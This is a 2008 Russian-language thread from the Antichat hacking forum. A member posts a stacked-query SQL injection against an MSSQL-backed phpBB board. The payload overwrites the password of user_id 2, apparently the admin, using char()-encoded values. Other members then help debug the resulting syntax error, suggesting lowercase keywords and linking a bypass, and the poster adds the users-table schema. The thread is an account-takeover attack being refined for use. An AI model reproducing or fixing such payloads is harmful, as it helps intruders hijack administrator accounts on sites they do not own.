ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Sql в Mssql
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Sql в Mssql
  #1  
Старый 01.02.2008, 05:41
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию Sql в Mssql
еСТЬ СКУЛЬ
Код:
299+or+1=+1;UPDATE+phpbb_users+SET+user_newpasswd=char(101)%2Bchar(49)%2Bchar(48)%2Bchar(97)%2Bchar(100)%2Bchar(99)%2Bchar(51)%2Bchar(57)%2Bchar(52)%2Bchar(57)%2Bchar(98)%2Bchar(97)%2Bchar(53)%2Bchar(57)%2Bchar(97)%2Bchar(98)%2Bchar(98)%2Bchar(101)%2Bchar(53)%2Bchar(54)%2Bchar(101)%2Bchar(48)%2Bchar(53)%2Bchar(55)%2Bchar(102)%2Bchar(50)%2Bchar(48)%2Bchar(102)%2Bchar(56)%2Bchar(56)%2Bchar(51)%2Bchar(101)+WHERE+user_id=2--
Выдает ошибку
[Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'ORDER'.

В чем проблема?
 
Ответить с цитированием

  #2  
Старый 01.02.2008, 08:13
Аватар для b3
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию
Цитата:
299+or+1=+1;UPDATE+
;- в етом. А ето : user_newpasswd= сам придумал колонку? И скачай дистрибутив форума и глянь как там в исходнике запрос выглядит.
Последний раз редактировалось b3; 01.02.2008 в 08:15..
 
Ответить с цитированием

  #3  
Старый 01.02.2008, 13:59
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Это тебе надо это сделать ! И азы почитать........ И кста как это если не секрет в исходниках запрос на смену пасса найти, я думал все намного проще через sql запрос проходит.
А при update (привожу спецом для тебя) в phpbb меняется значение user_newpasswd!!

А вот те и исходники дампа
mssql_schema
Код:
CREATE TABLE [phpbb_users] (
	[user_id] [int] NOT NULL ,
	[user_active] [smallint] NULL ,
	[username] [varchar] (25) NOT NULL ,
	[user_password] [varchar] (32) NOT NULL ,
	[user_session_time] [int] NOT NULL ,
	[user_session_page] [smallint] NOT NULL ,
	[user_lastvisit] [int] NOT NULL ,
	[user_regdate] [int] NOT NULL ,
	[user_level] [smallint] NOT NULL ,
	[user_posts] [int] NOT NULL ,
	[user_timezone] [decimal] (5,2) NOT NULL ,
	[user_style] [int] NULL ,
	[user_lang] [varchar] (255) NULL ,
	[user_dateformat] [varchar] (14) NOT NULL ,
	[user_new_privmsg] [smallint] NOT NULL ,
	[user_unread_privmsg] [smallint] NOT NULL ,
	[user_last_privmsg] [int] NOT NULL ,
	[user_emailtime] [int] NOT NULL ,
	[user_viewemail] [smallint] NULL ,
	[user_attachsig] [smallint] NULL ,
	[user_allowhtml] [smallint] NULL ,
	[user_allowbbcode] [smallint] NULL ,
	[user_allowsmile] [smallint] NULL ,
	[user_allowavatar] [smallint] NULL ,
	[user_allow_pm] [smallint] NOT NULL ,
	[user_allow_viewonline] [smallint] NOT NULL ,
	[user_notify_pm] [smallint] NOT NULL ,
	[user_popup_pm] [smallint] NULL ,
	[user_rank] [int] NULL ,
	[user_avatar_type] [smallint] NULL ,
	[user_avatar] [varchar] (100) NULL ,
	[user_email] [varchar] (255) NULL ,
	[user_icq] [varchar] (15) NULL ,
	[user_website] [varchar] (100) NULL ,
	[user_occ] [varchar] (100) NULL ,
	[user_from] [varchar] (100) NULL ,
	[user_sig] [text] NULL ,
	[user_sig_bbcode_uid] [char] (10) NULL ,
	[user_aim] [varchar] (255) NULL ,
	[user_yim] [varchar] (255) NULL ,
	[user_msnm] [varchar] (255) NULL ,
	[user_interests] [varchar] (255) NULL ,
	[user_actkey] [varchar] (32) NULL ,
	[user_newpasswd] [varchar] (32) NULL ,	[user_notify] [smallint] NOT NULL
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

Если не знаешь не пиши!!!!)))
Последний раз редактировалось fly; 01.02.2008 в 14:04..
 
Ответить с цитированием

  #4  
Старый 01.02.2008, 16:23
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
С маленькой буквы пиши. union select update order и тд
 
Ответить с цитированием

  #5  
Старый 01.02.2008, 16:50
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Да разницы нет! Почему вылетает Incorrect syntax near the keyword 'ORDER'.
 
Ответить с цитированием

  #6  
Старый 01.02.2008, 17:02
Аватар для Basurman
Basurman
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868

Репутация: 849
Отправить сообщение для Basurman с помощью ICQ
По умолчанию
для 9.00.xxx есть

для примера: https://forum.antichat.ru/showpost.php?p=413076&postcount=19
Если там написать мелкими букавками - все пройдет на ура
Последний раз редактировалось Basurman; 01.02.2008 в 17:04..
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ